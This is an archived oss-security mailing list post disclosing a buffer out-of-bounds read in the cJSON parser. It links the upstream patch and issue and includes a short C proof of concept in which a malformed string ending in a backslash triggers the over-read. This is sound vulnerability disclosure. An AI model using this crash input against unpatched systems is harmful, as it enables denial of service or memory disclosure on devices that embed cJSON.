Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 2 Oct 2016 20:06:25 +0800
From: Marco Grassi <marco.gra@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: cJSON buffer out of bound read

Hi,

I would like to report a buffer out of bound read problem in cJSON, which
is a embeddable JSON parser, used (I imagine) in embedded devices, or even
bigger stuff like the ps4 (
http://doc.dl.playstation.net/doc/ps4-oss/cjson.html).

patch:
https://github.com/DaveGamble/cJSON/commit/94df772485c92866ca417d92137747b2e3b0a917

issue:
https://github.com/DaveGamble/cJSON/issues/30

Poc with the malformed string

#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include "cJSON.h"

static const char *my_json = "\"000000000000000000\\";

int main(int argc, const char * argv[]) {
    cJSON * root = cJSON_Parse(my_json);
    char * rendered = cJSON_Print(root);
    printf("%s\n", rendered);
    return 0;
}

thanks

Marco

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ